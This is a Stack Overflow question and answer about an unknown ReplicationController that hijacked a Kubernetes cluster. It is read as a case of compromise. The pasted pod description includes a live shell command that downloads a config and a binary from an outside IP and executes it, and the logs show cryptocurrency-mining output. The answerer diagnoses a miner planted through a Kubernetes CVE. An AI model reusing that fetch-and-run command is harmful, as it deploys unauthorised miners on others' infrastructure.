K
Q

k8s create rc and pods automatically in default namespace

12/26/2018

My k8s's default namespace add an rc i din't know, it starts 10 pods automatically. and i don't know why.

My k8s version is:

kubectl version
Client Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:34:11Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:23:29Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}

And, the pods looks like this: kubectl get po --namespace=default

NAME            READY     STATUS              RESTARTS   AGE
mi125yap1       0/1       ImagePullBackOff    0          1d
y1ee114-2hmp4   0/1       ContainerCreating   0          5h
y1ee114-4hqg4   0/1       ImagePullBackOff    0          5h
y1ee114-5tcb5   0/1       ContainerCreating   0          5h
y1ee114-8ft9x   1/1       Running             0          5h
y1ee114-b9bjn   0/1       ImagePullBackOff    0          5h
y1ee114-ptw9g   0/1       ImagePullBackOff    0          5h
y1ee114-rxl4m   0/1       ImagePullBackOff    0          5h
y1ee114-tn9zw   0/1       ImagePullBackOff    0          5h
y1ee114-tx99w   1/1       Running             0          5h
y1ee114-z9b4m   0/1       ImagePullBackOff    0          5h

The two master node with public net it start succesfully, but the node with out access to public net fiald:ImagePullBackOff.

One detail of the pod is:

kubectl describe po y1ee114-8ft9x --namespace=default
Name:           y1ee114-8ft9x
Namespace:      default
Node:           server2/172.17.0.102
Start Time:     Wed, 26 Dec 2018 05:35:15 +0800
Labels:         app=myresd01
Annotations:    kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicationController","namespace":"default","name":"y1ee114","uid":"f7ec0108-088c-11e9-856f-00163e160da9"...
Status:         Running
IP:             10.1.42.2
Created By:     ReplicationController/y1ee114
Controlled By:  ReplicationController/y1ee114
Containers:
  myresd01:
    Container ID:  docker://0b237f7e6c2b359dc1227cfdd1b726e6f6bb5346bcca129ec6a5b15336e13b25
    Image:         centos
    Image ID:      docker-pullable://centos@sha256:184e5f35598e333bfa7de10d8fb1cebb5ee4df5bc0f970bf2b1e7c7345136426
    Port:          <none>
    Command:
      sh
      -c
      curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json
    State:          Running
      Started:      Wed, 26 Dec 2018 05:35:20 +0800
    Ready:          True
    Restart Count:  0
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-5xcgh (ro)
Conditions:
  Type           Status
  Initialized    True
  Ready          True
  PodScheduled   True
Volumes:
  shared-data:
    Type:    EmptyDir (a temporary directory that shares a pod's lifetime)
    Medium:
  default-token-5xcgh:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-5xcgh
    Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     <none>
Events:          <none>

And some of logs is:

[2018-12-26 02:46:18] accepted (870/0) diff 2000 (245 ms)
[2018-12-26 02:46:23] accepted (871/0) diff 2000 (246 ms)
[2018-12-26 02:46:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:46:51] accepted (872/0) diff 2000 (248 ms)
[2018-12-26 02:47:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:47:46] accepted (873/0) diff 2000 (245 ms)
[2018-12-26 02:47:49] accepted (874/0) diff 2000 (245 ms)
[2018-12-26 02:47:56] accepted (875/0) diff 2000 (247 ms)
[2018-12-26 02:48:10] accepted (876/0) diff 2000 (391 ms)
[2018-12-26 02:48:18] accepted (877/0) diff 2000 (245 ms)
[2018-12-26 02:48:20] accepted (878/0) diff 2000 (245 ms)
[2018-12-26 02:48:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:48:37] accepted (879/0) diff 2000 (246 ms)
[2018-12-26 02:48:39] accepted (880/0) diff 2000 (245 ms)
[2018-12-26 02:49:00] accepted (881/0) diff 2000 (245 ms)
[2018-12-26 02:49:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:49:39] accepted (882/0) diff 2000 (245 ms)
[2018-12-26 02:50:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:01] accepted (883/0) diff 2000 (245 ms)
[2018-12-26 02:51:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:27] accepted (884/0) diff 2000 (248 ms)

Who know who create this rc and what this for?

-- user8645601
kubernetes
microk8s

Similar Questions

Is there any way to clean/delete some older packages in helm repo?
Unable to set up kubernetes because of "no matching manifest for unknown in the manifest list entries"
Accessing nginx ingress controller on port 80
Unable to wget/curl from a kubernetes Pod with https/443
Running Kubernetes locally on M1 Mac
Could not update containr args in Pods - kuberneties -got &#39;pod updates may not change fields&#39;
Next js production build is not finding environment variables when deployed via kubernetes
Unable to get ArgoCD working on EC2 running centos 7
How can I restart Elasticsearch K8S deployment

1 Answer

12/26/2018

Those are cryptocurrency miners. My guess is your cluster was hacked via the Kubernetes websocket upgrade CVE (https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/). I would probably destroy and recreate your cluster.

I figured this out by downloading http://192.99.142.232:8220/tte2 which was mentioned in the config of your describe output and discovered it was an ELF binary. I ran strings on the binary and after some scrolling found a bunch of strings referring to "cryptonight" which is cryptocurrency mining software.

-- Russell Cohen
Source: StackOverflow